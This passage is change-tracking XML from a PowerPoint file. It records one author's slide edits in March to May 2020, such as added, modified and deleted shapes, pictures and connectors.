            <ac:spMk id="2" creationId="{86A5B209-AC55-4E08-A190-91A11CE033FE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T13:51:56.719" v="1557" actId="113"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2615942091" sldId="608"/>
            <ac:spMk id="3" creationId="{021B5C2F-CB54-49E3-A63B-B9EFFC0ADC0A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T13:54:48.472" v="1563" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1523045854" sldId="609"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T13:43:37.894" v="1158" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1523045854" sldId="609"/>
            <ac:spMk id="2" creationId="{E725E0E5-6DDE-4F3F-8A77-39B32D37D37A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T13:44:05.342" v="1210" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1523045854" sldId="609"/>
            <ac:spMk id="3" creationId="{6655F54A-F10D-46D7-ADEA-8CF86C3571F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T13:47:33.910" v="1363" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1523045854" sldId="609"/>
            <ac:spMk id="5" creationId="{5870FB10-1452-4DD7-BEFE-458BF1C8A378}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T13:54:48.472" v="1563" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1523045854" sldId="609"/>
            <ac:spMk id="6" creationId="{C99562AF-218C-41EC-B6FD-D94C57E01AA4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T13:47:54.822" v="1375" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1523045854" sldId="609"/>
            <ac:spMk id="7" creationId="{6DF40E5C-5A14-426E-BF12-7AC85744DC31}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T13:48:16.678" v="1395" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1523045854" sldId="609"/>
            <ac:spMk id="9" creationId="{866C4B82-7925-4E7F-ABC2-490D5AABC461}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T13:48:31.983" v="1405" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1523045854" sldId="609"/>
            <ac:spMk id="13" creationId="{5B3935B8-61AB-44C8-A144-62C3DE686357}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T13:48:43.695" v="1411" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1523045854" sldId="609"/>
            <ac:picMk id="4" creationId="{670B7182-1AF7-4141-88BC-A0140B8FC780}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T13:48:36.270" v="1407" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1523045854" sldId="609"/>
            <ac:cxnSpMk id="8" creationId="{C142F9E4-7AD7-4F4A-9926-1BFE620BE05D}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T13:48:48.942" v="1412" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1523045854" sldId="609"/>
            <ac:cxnSpMk id="14" creationId="{5346F5E7-8A72-4222-A683-F974D8590529}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T13:49:04.986" v="1416" actId="692"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1523045854" sldId="609"/>
            <ac:cxnSpMk id="18" creationId="{4FE8CFC1-FCD6-4961-81D6-7565395F9416}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T13:49:15.958" v="1419" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1523045854" sldId="609"/>
            <ac:cxnSpMk id="19" creationId="{35F19E07-BE4B-40E6-81D6-8923D706AA20}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T13:59:28.161" v="1818" actId="404"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="741636325" sldId="610"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T13:55:03.103" v="1594" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="741636325" sldId="610"/>
            <ac:spMk id="2" creationId="{B849DA0E-7FA8-4B8F-B5D9-9B336B9F5AC5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T13:59:28.161" v="1818" actId="404"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="741636325" sldId="610"/>
            <ac:spMk id="3" creationId="{7F137BEB-A76B-46A9-9185-C1503DFCE3A0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T13:58:15.925" v="1750"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="741636325" sldId="610"/>
            <ac:spMk id="5" creationId="{64211842-CB8C-4770-9844-FDEFA5C3919E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T13:58:50.408" v="1760" actId="14861"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="741636325" sldId="610"/>
            <ac:picMk id="4" creationId="{7E56F23A-00B5-4052-8E56-B17D545A5B95}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T13:58:50.408" v="1760" actId="14861"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="741636325" sldId="610"/>
            <ac:picMk id="6" creationId="{7967FAE7-3222-47B0-AF56-838E37187B36}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T14:34:52.904" v="2486" actId="5793"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3209646095" sldId="611"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T13:59:43.873" v="1842" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3209646095" sldId="611"/>
            <ac:spMk id="2" creationId="{83F2C728-0525-49F7-A800-07E3C65F00DC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T14:34:52.904" v="2486" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3209646095" sldId="611"/>
            <ac:spMk id="3" creationId="{887F7C9B-9734-48E9-8510-45FDF37BBD09}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T14:34:26.233" v="2444" actId="14861"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3209646095" sldId="611"/>
            <ac:picMk id="4" creationId="{935F4033-B0A6-48BD-96FD-B9C838A63C9D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T14:34:26.233" v="2444" actId="14861"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3209646095" sldId="611"/>
            <ac:picMk id="5" creationId="{86DC3684-3C11-42A9-871C-89307E1F8E79}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-04-01T11:35:52.569" v="3890" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1848797502" sldId="612"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-04-01T11:35:52.569" v="3890" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1848797502" sldId="612"/>
            <ac:spMk id="2" creationId="{96D04A2B-6FD9-43BB-BA97-61C42197E349}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T14:30:58.856" v="2367" actId="404"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1848797502" sldId="612"/>
            <ac:spMk id="3" creationId="{80335C83-0036-44E6-BDFA-05B4B0256ACA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T14:29:54.929" v="2216" actId="14861"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1848797502" sldId="612"/>
            <ac:picMk id="4" creationId="{8D046F93-E999-437A-88F3-789CA63E36A0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{97349B5E-4AE1-4A81-8319-8E39BE600DCC}" dt="2020-03-31T14:30:11.886" v="2235" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1848797502" sldId="612"/>
            <ac:picMk id="5" creationId="{13CAADE6-ADEC-4500-8507-342F6B886B68}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{62BFEEC8-FF0E-E814-687B-E4AD81DDC31A}"/>
    <pc:docChg chg="addSld modSld">
      <pc:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{62BFEEC8-FF0E-E814-687B-E4AD81DDC31A}" dt="2020-03-26T14:55:32.115" v="5" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{62BFEEC8-FF0E-E814-687B-E4AD81DDC31A}" dt="2020-03-26T14:55:17.647" v="3" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2522854228" sldId="604"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{62BFEEC8-FF0E-E814-687B-E4AD81DDC31A}" dt="2020-03-26T14:55:17.647" v="3" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2522854228" sldId="604"/>
            <ac:spMk id="3" creationId="{A3FD7ACC-7C5D-4DE2-8122-25A92276CECB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{139F887A-ADC9-4913-BD2C-2259C224371D}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{139F887A-ADC9-4913-BD2C-2259C224371D}" dt="2020-05-29T13:48:49.453" v="1" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{139F887A-ADC9-4913-BD2C-2259C224371D}" dt="2020-05-29T13:48:49.453" v="1" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{139F887A-ADC9-4913-BD2C-2259C224371D}" dt="2020-05-29T13:48:49.453" v="1" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="256"/>
            <ac:spMk id="130" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}"/>
    <pc:docChg chg="custSel delSld modSld sldOrd">
      <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:27:36.512" v="324"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:24:39.977" v="39" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:24:23.953" v="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DA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:24:39.977" v="39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 ord">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:27:36.512" v="324"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="34493695" sldId="588"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:24:54.793" v="53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DA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:25:18.296" v="11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Sp modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:27:20.864" v="323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6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:27:20.864" v="323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6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:25:48.337" v="181" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3392114702" sldId="592"/>
            <ac:spMk id="3" creationId="{FF20D8FE-5958-4695-9408-98B27A546595}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:25:38" v="132" actId="478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6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:26:06.969" v="217" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="186350803" sldId="593"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:25:54.457" v="19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6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:26:06.969" v="217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Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:26:20.794" v="224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6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:26:14.841" v="223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6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:26:20.794" v="22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delSp modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:26:33.121" v="234" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2184503986" sldId="595"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:26:27.688" v="230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6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:26:33.121" v="234" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2184503986" sldId="595"/>
            <ac:spMk id="3" creationId="{E4DD9BDA-76BD-42BF-8240-DFE65A9F6B08}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:26:30.921" v="232" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2184503986" sldId="595"/>
            <ac:spMk id="6" creationId="{0860451D-C80E-4FA6-BB41-9A2ABCC316B7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:26:29.376" v="231" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2184503986" sldId="595"/>
            <ac:picMk id="4" creationId="{33B4FF74-80A0-49A4-9737-511B20327150}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:26:31.473" v="233" actId="478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del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:26:35.487" v="235" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2712760629" sldId="596"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:26:36.761" v="236" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3605241094" sldId="597"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:26:37.597" v="237" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4179620376" sldId="599"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:26:42.529" v="242" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2099074545" sldId="600"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:26:39.224" v="238" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1495885431" sldId="601"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:26:41.796" v="241" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4124090435" sldId="602"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:27:04.519" v="321" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3844088356" sldId="603"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:26:54.985" v="291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6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:27:02.128" v="320" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3844088356" sldId="603"/>
            <ac:spMk id="3" creationId="{9A0A705D-DDC3-4FDE-84E5-E99E71AC52EA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:27:04.519" v="321" actId="478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6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:26:40.279" v="239" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3037668452" sldId="604"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{6BDA9657-F88B-45BD-B1DA-7E2F1FA0077F}" dt="2020-03-19T19:26:40.651" v="240" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1760163838" sldId="605"/>
